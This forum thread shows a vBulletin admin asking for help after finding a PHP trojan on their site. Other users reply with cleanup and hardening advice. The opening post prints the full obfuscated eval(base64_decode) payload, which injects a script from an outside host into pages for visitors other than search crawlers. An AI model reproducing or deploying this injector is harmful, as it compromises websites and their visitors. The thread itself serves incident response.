how someone add PHP Trojan horse to my vb4

Collapse
X

• Filter
  • Time
  • Show
Clear All

• [Forum] how someone add PHP Trojan horse to my vb4

What should i to do to know who and how he add it my forum?

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX2 5vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAg IGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0ci gkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQ X1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y2 1NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzVqYjIwdmJHd3VjR2h3SWo0OEwzTmpj bWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leG lzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFB NTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QT lDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4 ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUj MwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdB NEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLD IpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFE MDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRU RFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBB NzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUj VBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVB NTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgIC AgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfS AgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkz OTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQT MzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQw MzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQT MzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3 NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QT E4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3 RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RT I4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAg ICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS kpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQx JywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNz lBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcp OyAgIH0gIH0="));?>
    Making Money Online

In many cases I find the hackers have inserted their code into the templates to deface the site. If that is the case then you need to run this query on your database in phpmyadmin:

DELETE FROM template
    WHERE template LIKE '%base64%'

Then run the "install/finalupgrade.php" script to reimport the XML files. That should get rid of the defacement.

Then please see this thread on how to make your vBulletin more secure:

http://www.vbulletin.com/go/secure

If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

Steve Machol Photography

Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

Comment

Can you decode this php file

Originally posted by Steve Machol View Post
      In many cases I find the hackers have inserted their code into the templates to deface the site. If that is the case then you need to run this query on your database in phpmyadmin:

DELETE FROM template
      WHERE template LIKE '%base64%'

Then run the "install/finalupgrade.php" script to reimport the XML files. That should get rid of the defacement.

Then please see this thread on how to make your vBulletin more secure:

http://www.vbulletin.com/go/secure

If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
      Making Money Online

Comment

Also upgrade to the latest version if you aready haven''t. And ask your host to check their access logs and see how exactly did the hacker/s got in.

Comment

Originally posted by pointalk View Post
          Can you decode this php file
          Try the online utility found here.

Apparently the hacker made a mistake, since the Base-64 encoded PHP code cannot be properly decoded at the end...

Comment

You are one of the many victims of an apparently know PHP attack

By the way, you may want to check out this post: How-To-Remove-The-evalbase64_decode-Virus.

Apparently there's been a massive attack on GoDaddy and other major hosted sites.

Comment

Check all pcs that have ftp access top your site and scan them with several anti-virus scanners. This may well be a worm that works trough your ftp program. Therefore it can infect your site again and again until you clean all pc's.
              I buy 420 forums

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...
              X